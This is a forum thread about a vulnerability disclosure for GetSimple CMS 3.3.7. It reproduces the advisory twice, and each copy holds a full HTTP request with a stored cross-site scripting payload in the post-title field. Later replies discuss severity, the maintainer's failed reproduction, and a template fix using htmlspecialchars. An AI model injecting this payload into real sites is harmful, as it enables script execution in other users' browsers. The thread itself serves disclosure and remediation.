Thread Rating:
  • 0 Vote(s) - 0 Average
  • 1
  • 2
  • 3
  • 4
  • 5
BUG REPORT GetSimple CMS Security Vulnerabilities Notification
#1
================================================================
GetSimple CMS – Version 3.3.7  – Cross-Site Scripting Vulnerability
================================================================

Information
--------------------

Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 3.3.7
Vendor Homepage:http://get-simple.info/
CVE-ID :
Severity : Medium
Author – Sachin Wagh (@tiger_tigerboy)

Description
--------------------

GetSimple CMS – Version 3.3.7 is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.

Proof of Concept URL
--------------------
1.Burp Request

POST /GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/changedata.php HTTP/1.1
Host: 192.168.43.247
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/edit.php?id=index
Cookie: resolveIDs=0; _ga=GA1.1.887840288.1449038898; _gat=1; __atuvc=1%7C48; __atuvs=565e943f4578f9bd000; GS_ADMIN_USERNAME=root; 23d26db5c4d135b5023bc2a6f56e8b43fd28957a=2b306ac4a5da6faed782e8c4eefa9f88ecfe4279
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 374

nonce=cf4df04f528f5eef2cb82bd16febfc841bac45ec&post-author=root&post-title= "><img src=x onerror=prompt(1)>&post-private=&post-parent=&post-template=template.php&post-menu-enable=on&post-menu=Home&post-menu-order=1&post-id=index&post-metak=getsimple%2C+easy%2C+content+management+system&post-metad=+%22%3E&post-content=%3Cp%3EBlog%3C%2Fp%3E%0D%0A&existing-url=index&redirectto=&submitted=Save+Updates


2.After saving go to http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/

Advisory Information:
================================================
GetSimple CMS  XSS Vulnerability

Severity Level:
=========================================================
Med

Description:
==========================================================

Vulnerable Product:
                               [+]  GetSimple CMS 3.3.7

Vulnerable Parameter(s):
                               [+]  post-title


Affected Area(s):
                               [+]  http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/

Credits & Authors
--------------------
Sachin Wagh (@tiger_tigerboy)

================================================================
GetSimple CMS – Version 3.3.7  – Cross-Site Scripting Vulnerability
================================================================

Information
--------------------

Vulnerability Type : Cross Site Scripting Vulnerability
Vulnerable Version : 3.3.7
Vendor Homepage:http://get-simple.info/
CVE-ID :
Severity : Medium
Author – Sachin Wagh (@tiger_tigerboy)

Description
--------------------

GetSimple CMS – Version 3.3.7 is prone to Multiple a Cross-site scripting vulnerability because it fails to sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code
in the browser of an unsuspecting user in the context of the affected site.

Proof of Concept URL
--------------------
1.Burp Request

POST /GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/changedata.php HTTP/1.1
Host: 192.168.43.247
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/admin/edit.php?id=index
Cookie: resolveIDs=0; _ga=GA1.1.887840288.1449038898; _gat=1; __atuvc=1%7C48; __atuvs=565e943f4578f9bd000; GS_ADMIN_USERNAME=root; 23d26db5c4d135b5023bc2a6f56e8b43fd28957a=2b306ac4a5da6faed782e8c4eefa9f88ecfe4279
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 374

nonce=cf4df04f528f5eef2cb82bd16febfc841bac45ec&post-author=root&post-title= "><img src=x onerror=prompt(1)>&post-private=&post-parent=&post-template=template.php&post-menu-enable=on&post-menu=Home&post-menu-order=1&post-id=index&post-metak=getsimple%2C+easy%2C+content+management+system&post-metad=+%22%3E&post-content=%3Cp%3EBlog%3C%2Fp%3E%0D%0A&existing-url=index&redirectto=&submitted=Save+Updates


2.After saving go to http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/

Advisory Information:
================================================
GetSimple CMS  XSS Vulnerability

Severity Level:
=========================================================
Med

Description:
==========================================================

Vulnerable Product:
                               [+]  GetSimple CMS 3.3.7

Vulnerable Parameter(s):
                               [+]  post-title


Affected Area(s):
                               [+]  http://localhost/GetSimpleCMS_3.3.7/GetSimpleCMS-3.3.7/


For any questions related to this notification message - please contact on : wsachin092@gmail.com

Best Regards,

Sachin Wagh
Reply
#2
Did you send this to shawn_a before publicly disclosing this vulnerability?
Web Developer
Plugins: GS Plugin Installer | Referrer Blocker | Password Protect
Reply
#3
Ill fix these in 3.3.8 probably
they are moderate, since they require admin privs
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Reply
#4
I cannot reproduce this, onerror get removed by xss_clean
maybe I am not reproducing payload properly.
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Reply
#5
Fix: replace <?php get_page_title(); ?> by <?php echo htmlspecialchars(get_page_title(false)); ?> in your template.

(to make get_page_title render page titles as text instead of html)
Reply
#6
(2015-12-06, 19:16:32)Carlos Wrote: Fix: replace <?php get_page_title(); ?> by <?php echo htmlspecialchars(get_page_title(false)); ?> in your template.

(to make get_page_title render page titles as text instead of html)

Hello shawn_a,

Can you share the email-id so I can send POC Video.
Reply
#7
Sorry to raise an old thread.

Was the XSS Vulnerability addressed in later versions after v3.3.7?
I can't find any further reference to it.
Reply
#8
Did you check github or release notes?
NEW: SA Admin Toolbar Plugin | View All My Plugins
- Shawn A aka Tablatronix
Reply




Users browsing this thread: 1 Guest(s)